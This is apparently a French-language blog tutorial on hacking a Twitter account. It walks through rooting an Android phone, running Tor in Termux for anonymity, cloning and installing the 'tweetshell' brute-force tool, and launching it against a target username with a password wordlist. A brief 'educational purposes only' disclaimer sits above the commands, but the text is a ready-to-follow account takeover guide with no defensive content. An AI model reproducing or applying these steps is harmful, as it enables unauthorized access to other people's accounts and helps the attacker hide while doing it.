comment pirater un compte Twitter

Salut ! Aujourd'hui, je vais vous montrer comment pirater un compte Twitter en utilisant BruteForce (force brute) en utilisant Termux. Parlant d'une manière populaire, c'est la sélection habituelle d'un mot de passe.

Attention! Pour ce faire, vous avez besoin des droits root ! Je ne veux pas entrer dans les détails, mais bref, c'est fait avec TWRP + Magisk. Ensuite, vous devez vous rendre sur Termux et installer tsu (pkg install tsu) et root-repo (pkg install root-repo).  Boum. C'est fait!


On n'est bien d'accord j'espère !

Attention!

Attention cette tutoriel est à but uniquement éducatif et documentaire : je n’incite personne à commettre des choses illégales avec le contenu de cette blog : mon objectif à travers cette blog est de vous enseigner la sécurité informatique éthique. Je ne serai pas responsable de vos bêtises en cas de problème avec la loi.

Okay....commençons


apt update && apt upgrade

pkg install tor git python python2 php openssh curl root-repo tsu

Run to pour l'anonymat. Tapez 

Tor

Attention, pour continuer à tapez les commandes vous devez ouvrir une nouvel session dans Termux et pour le faire glisser vos doigts du gauche vers la droite,  puis cliquez sur NEW SESSSION en bas.

En suite tapez c'est commande:

git clone https://github.com/thelinuxchoice/tweetshell

cd tweetshell

chmod +x *

 Accorder les droits de super utilisateur Termux en tapant la commande 

tsu

 Maintenant nous allons Installer des dépendances requises

./install.sh

 Pour lancer le piratage du compte tapez:

./tweetshell.sh

Ensuite, dans la fenêtre qui apparaît, vous devez entrer le nom d'utilisateur, le nom du fichier avec les mots de passe (vous pouvez utiliser le standard en appuyant sur Entrée), le nombre de threads (threads) à partir desquels le mot de passe sera deviné (wordlist) .


😅😅😅d'après tout c'est étapes,  le brute force débuteras et vous n'aurai qu'à croiser les pieds 👣 , pour attendre le mot de passe du compte.


DMCA.com Protection Status